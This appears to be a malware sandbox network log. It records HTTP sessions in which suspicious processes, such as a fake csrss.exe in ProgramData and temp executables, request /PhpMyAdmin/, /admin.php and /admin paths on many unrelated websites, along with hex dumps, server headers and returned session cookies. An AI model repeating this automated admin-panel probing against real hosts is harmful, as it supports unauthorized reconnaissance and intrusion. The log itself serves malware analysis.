                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F0GpF4fCxu3%2FiLvU%2F6Tv4copxeTwdAOxHBG08%2FGJiTCkXNtoExt39aj9xGMSWZ9ZRrR%2Bg%2BMI4QbMQA7KNsmkvLYX7MzllojLNJYESlb%2BL8RboEEH6zxjT0Ovt1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6cec8a44db-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 32 38 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 3c 74 69 74 6c 65 3e 3a 2e 20 54 65 72 6e 61 4e 65 74 20 2e 3a 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 2f 62 6f 6f 74 73 74 72 61 70 74 61 73 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 28c1<!DOCTYPE html><html lang="es"><head><meta charset="utf-8"><title>:. TernaNet .:</title><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="description" content /><meta name="author" content="//bootstraptaste
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 20 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: avbar navbar-default navbar-static-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 72 65 66 3d 22 73 65 70 69 6e 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 53 6f 63 69 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 6d 6f 76 69 6c 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 4d 6f 76 69 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 69 64 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 49 44 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 20 64 61 74 61 2d 68 6f 76 65 72 3d 22 64 72 6f 70 64 6f 77 6e 22 20 64 61 74 61 2d 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ref="sepin.html">TernaSocial</a></li><li><a href="ternamovil.html">TernaMovil</a></li><li><a href="ternaid.html">TernaID</a></li></ul></li><li class="dropdown"> <a href="#" class="dropdown-toggle " data-toggle="dropdown" data-hover="dropdown" data-de
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 69 6f 6e 65 73 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 74 68 65 6d 65 22 3e 45 64 69 63 69 6f 6e 65 73 20 79 20 50 72 65 63 69 6f 73 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 73 6c 69 64 65 73 2f 34 2e 6a 70 67 22 20 61 6c 74 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 70 3e c2 bf 4c 65 20 69 6e 74 65 72 65 73 61 20 6e 75 65 73 74 72 6f 20 73 65 72 76 69 63 69 6f 3f 3c 2f 70 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 65 64 69 63 69 6f 6e 65 73 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 74 68 65 6d 65 22 3e 45 64 69 63 69 6f 6e 65 73 20 79 20 50 72 65 63 69 6f 73 3c 2f 61 3e 20 3c 2f 64 69 76 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: iones.html" class="btn btn-theme">Ediciones y Precios</a> </div></li><li> <img src="img/slides/4.jpg" alt /><div class="flex-caption"><p>Le interesa nuestro servicio?</p><a href="ediciones.html" class="btn btn-theme">Ediciones y Precios</a> </div>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 64 65 6c 20 63 6c 69 65 6e 74 65 20 61 20 66 69 6e 20 64 65 20 6f 66 72 65 63 65 72 20 6c 61 20 6d 61 79 6f 72 20 61 64 61 70 74 61 62 69 6c 69 64 61 64 20 61 20 73 75 73 20 6e 65 63 65 73 69 64 61 64 65 73 2e 20 45 73 20 70 6f 72 20 65 73 74 6f 20 71 75 65 20 66 75 6e 63 69 6f 6e 61 20 70 61 72 61 20 43 6f 6c 65 67 69 6f 73 2c 20 4c 69 63 65 6f 73 2c 20 49 6e 73 74 69 74 75 74 6f 73 20 55 6e 69 76 65 72 73 69 74 61 72 69 6f 73 2c 20 43 65 6e 74 72 6f 20 64 65 20 43 75 72 73 6f 73 2c 20 55 6e 69 76 65 72 73 69 64 61 64 65 73 20 79 20 64 65 6d c3 a1 73 2e 3c 2f 70 3e 0a 0a 0a 3c 70 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 74 68 69 73 5f 73 68 61 72 69 6e 67 5f 74 6f 6f 6c 62 6f 78 22 3e 3c 2f 64 69 76 3e 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: del cliente a fin de ofrecer la mayor adaptabilidad a sus necesidades. Es por esto que funciona para Colegios, Liceos, Institutos Universitarios, Centro de Cursos, Universidades y dems.</p><p><div class="addthis_sharing_toolbox"></div></p></div></
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67 6e 63 65 6e 74 65 72 22 3e 0a 3c 68 34 3e 41 75 74 6f 6d 61 74 69 7a 61 63 69 c3 b3 6e 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6f 67 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 4c 6f 73 20 72 65 71 75 69 73 69 74 6f 73 20 61 63 61 64 c3 a9 6d 69 63 6f 73 20 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 6f 73 20 73 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /div></div></div></div><div class="row"><div class="col-lg-3"><div class="box"><div class="box-gray aligncenter"><h4>Automatizacin</h4><div class="icon"> <i class="fa fa-cog fa-3x"></i> </div><p>Los requisitos acadmicos y administrativos so
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 63 75 73 74 6f 6d 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /div></div></div></div></footer></div><script type="text/javascript" src="js/jquery.min.js"></script><script type="text/javascript" src="js/bootstrap.min.js"></script><script type="text/javascript" src="js/custom.js"></script><script type="tex
2024-02-05 11:16:13 UTC | 858 | IN | Data Ascii: sync></script><script type="text/javascript">var LHCChatOptions = {};LHCChatOptions.opt = {widget_height:340,widget_width:300,popup_height:520,popup_width:500};(function() {var po = document.createElement('script'); po.type = 'text/javascript';
2024-02-05 11:16:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
230 | 192.168.2.6 | 49732 | 186.113.7.204 | 443 | 5176 | C:\Users\user\AppData\Local\Temp\nsx5151.tmp
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 188 | OUT | GET /PhpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 911 | IN | HTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1002
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BIGipServerPOOL_SOFIA_OFERTA_PDN_8680=2433883564.59425.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: dcid=1707131773186-10479769; Expires=Sun, 05-May-2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: pvid=1707131773186-33486568; Expires=Mon, 05-Feb-2024 11:21:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5avraaaaaaaaaaaaaaaa_session_=PFGGGHOEFHFJJIGLKLONMMHPJDIKNIEAHOHIINLMJBOIFAECOFHFANFLAEBNJHHDFOIDFJMKCDDMDOFEIHKAFOAODMFJLBMGIMJAJEMDGKLLKPGDDHFEFLPGPBDIIKFF; HttpOnly; secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS0130ba83=01fd6418ebf9b391ff7be85a7e259b18ee92b6459b4f4dc3e4bdcf6ca809e01ccab82d0297eebebe66346e18ace865d7ceb0548e9c0298c24ff897f9ef3dd0d345c515f5a944d23c2587cd15341766f1377e550cedc60c590b355975812aa5458dddc59248116b6e21cb64ae1bc8a7b592c019e791; Path=/; Domain=.oferta.senasofiaplus.edu.co; HTTPOnly
2024-02-05 11:16:13 UTC | 1002 | IN | Data Ascii: <html><head><title>JBoss Web/7.0.10.Final - Informe de Error</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-


Session ID | Source IP | Source Port | Destination IP | Destination Port
231 | 192.168.2.6 | 49691 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:13 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EM4A6iUmI89HU-Va0c5rFQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:13 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
232 | 192.168.2.6 | 49730 | 44.195.133.145 | 443 | 3132 | C:\ProgramData\Drivers\csrss.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 332 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FF
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 1057 | IN | HTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=63FBDB375E799FE348AE328A8197F7B1; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142573,id:F7BB58415B27927F21C3700158ABAED0,sessionId:7775344764,signature:81c7df77b97c05bffba0d70f1105bf4aad49b75260f03df15427adf2b838d3e3,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:4ca3e684-5c23-479e-88e4-1e1eafc733c2; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
2024-02-05 11:16:13 UTC | 15327 | IN | Data Ascii: bbc4... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
2024-02-05 11:16:13 UTC | 16384 | IN | Data Ascii: (0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]=t}function l(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),funct
2024-02-05 11:16:13 UTC | 16365 | IN | Data Ascii: a/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_factor_authentication.css?v=3900.84.0-rel.31+aedff82_authLogin" id="css_1"> <link rel="stylesheet" type="text/css" href="/we
2024-02-05 11:16:13 UTC | 19 | IN | Data Ascii: 7fe0bn,Rama
2024-02-05 11:16:13 UTC | 16384 | IN | Data Ascii: n,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTINGS['LOCALE_SETTINGS.MONTH_SHORT.00520'] = 'ene feb mar abr may jun jul ago sep oct nov dic'; LOCALE_SETTINGS['number
2024-02-05 11:16:13 UTC | 16384 | IN | Data Ascii: deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); deleteCookie("JSESSIONID", "/public", null, true); deleteCookie("JSESSIONID", "/pronunciation_audio", null, true);
2024-02-05 11:16:13 UTC | 12443 | IN | Data Ascii: div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verification-input" class="custom-label">Escriba el cdigo</label> <p id="mfa-verification-description" >Escriba el c


Session ID | Source IP | Source Port | Destination IP | Destination Port
233 | 192.168.2.6 | 49679 | 44.199.96.179 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 182 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 197 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
2024-02-05 11:16:13 UTC | 7358 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
234 | 192.168.2.6 | 50020 | 34.149.46.130 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 176 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 5747 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=1b278517-6cee-4a55-8084-fc0802274316; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
